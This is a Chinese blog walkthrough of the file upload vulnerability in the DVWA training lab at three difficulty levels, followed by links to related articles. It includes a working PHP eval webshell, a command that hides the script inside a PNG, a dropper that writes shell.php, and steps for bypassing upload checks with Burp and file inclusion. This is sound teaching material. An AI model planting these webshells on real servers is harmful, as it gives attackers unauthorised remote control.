DVWA 文件上传漏洞

已于 2023-11-16 22:48:15 修改
阅读量945 收藏 24
点赞数 3
文章标签: 网络 安全
于 2023-11-16 22:47:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbkx974/article/details/134449997
版权

DVWA 文件上传漏洞

文章目录

前言

本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞

一、文件上传漏洞是是什么?

了解文件上传漏洞

二、Shell

1、命令解释器

WindowsLinux
powershellsh
cmdbash
zsh

2、Webshell

Webshell是一种用于攻击计算机系统的恶意脚本或程序,它可以在受攻击的网站或Web服务器上获得未经授权的访问权限。攻击者使用Webshell可以远程控制网站或服务器,并执行各种操作,例如执行任意代码、上传或下载文件、修改数据等。Webshell可以伪装成合法的文件或脚本,并常常隐藏在网站的文件系统中。它们对Web安全构成重大威胁,常被用于Web攻击。
后缀名通常为:

  • php
  • asp
  • aspx
  • jsp
    Webshell 接受来自于 web 用户的命令,然后在服务器端执行,也成为网站木马、木马后门、网马等。
Web容器脚本语言
Apache HTTPDphp
IISasp&aspx&php
Tomcatjsp&jspx

大马,代码量比较打,与小马对比
小马,一句话木马,需要与中国菜刀配合,特点是短小精悍,功能强大。

DVWA

在这里插入图片描述

初级

//初级的可以直接上传php文件,代码如下:
<!-- a.php -->
<?php
@eval($_REQUEST[maple]);
phpinfo();
?>

在这里插入图片描述

进入爆出的网站查看
http://10.4.7.130/dvwa_2.0.1/hackable/uploads/a.php

在这里插入图片描述

可以看到php配置说明上传成功,可以为所欲为了,接下来连接蚁剑

在这里插入图片描述

url地址为上传文件的地址,密码为刚刚给的maple值,测试连接成功就可以添加了

在这里插入图片描述

这里进来是我们上传木马的路径

中级

相比较初级,中级这里会报错

在这里插入图片描述

但是我们可以使用bp抓包,然后修改一个值

在这里插入图片描述

这里就会发现上传成功了,访问一下地址

在这里插入图片描述

蚁剑测试连接

在这里插入图片描述

成功连接

在这里插入图片描述

高级

之前的方法都不能用了,只能让我们上传JPEG或者PNG图片

在这里插入图片描述

我们随便截一个图片,然后将图片和a.php脚本结合,生成一个新图片

copy a.png/b+a.php/a a1.png

在这里插入图片描述

上传这个新的图片

在这里插入图片描述

上传成功,访问地址

在这里插入图片描述

可以进入,我们直接蚁剑测试

在这里插入图片描述

连接失败,我们来到低级文件包含漏洞页面查看一下

在这里插入图片描述

三个文件都查看一下

在这里插入图片描述

一次点击三个文件后发现?page=后面的文件名会变,所以我们尝试输入刚刚上传的文件,看会不会跳转

在这里插入图片描述

发现会跳转,用这个地址连接蚁剑测试一下

在这里插入图片描述

哦豁,居然还是不能连接,尝试传参看看

在这里插入图片描述

这里是成功的,但是连接不了蚁剑,咱们可以换一个代码

<?php
file_put_contents('shell.php','<?php @eval($_REQUEST[maple])?>');
phpinfo();
?>
//这个php脚本的作用是在当前文件夹下写入一个名为shell.php的脚本,内容为一句话木马

重新上传一下

在这里插入图片描述

刚刚从文件包含漏洞中可以得知我们到文件路径是http://10.4.7.130/dvwa_2.0.1/vulnerabilities/fi/..所以我们先访问一下这个文件,让他写出一个shell.php文件,然后使用蚁剑测试连接

在这里插入图片描述

这样就成功了

一十一丶青禾
关注
DVWA文件上传漏洞
HoYim
03-27 813
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,...
DVWA文件上传漏洞
m0_61851859的博客
02-05 378
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码中对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
DVWA】——File Upload(文件上传
最新发布
HinsCoder的博客
09-15 611
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
dvwa中的文件上传漏洞
无痕的博客
01-12 8386
dvwa漏洞环境演示文件上传漏洞
Dvwa文件上传漏洞
JBlock的博客
11-16 4089
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
dvwa文件上传漏洞
05-11
文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到控制服务器的目的。一旦攻击者上传了恶意文件,他就可以在服务器上执行任意代码,并获得服务器的权限。...
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1789
文件上传漏洞 低级别 中等级别 高级别
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1199
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA靶场-文件上传漏洞
热门推荐
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
DVWA-File Upload/文件上传漏洞
jammny
11-22 1156
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1772
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
DVWA文件上传漏洞(upload)
kirito_pio的博客
06-04 1740
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
DVWA文件上传漏洞
极光时流
03-31 673
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1526
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传的木马 上传的木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
dvwa靶场文件上传漏洞高级(high)
07-08
dvwa靶场是一个用于学习和测试Web应用程序漏洞的虚拟环境。文件上传漏洞是一种常见的安全漏洞,允许攻击者上传恶意文件到服务器上,可能导致远程代码执行或其他安全问题。 在dvwa靶场中,高级(high)级别的文件上传漏洞可通过以下步骤进行利用: 1. 登录到dvwa靶场:打开浏览器,输入dvwa的URL(如http://localhost/dvwa),然后使用默认的用户名和密码(admin/password)登录到dvwa靶场。 2. 寻找文件上传功能:在左侧的导航栏中,选择"File Upload"(文件上传)。 3. 检查上传限制:在高级级别中,dvwa通常会对上传文件的类型、大小和扩展名进行限制。查看页面上可能存在的任何限制提示。 4. 绕过文件类型限制:通常,服务器会根据文件扩展名来判断文件类型。尝试使用常见的绕过技巧,例如将文件扩展名修改为允许的类型之一(例如,将".php"修改为".jpg")。 5. 绕过文件大小限制:如果服务器对文件大小进行了限制,可以尝试使用分片上传或其他技术来绕过这些限制。 6. 利用上传的文件:一旦成功上传文件,可以尝试执行任意代码或访问上传的文件。 请注意,上述步骤仅适用于学习和测试目的,在真实环境中利用文件上传漏洞是非法的。确保在合法、合规的环境中进行安全测试,并遵守适用法律和道德准则。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值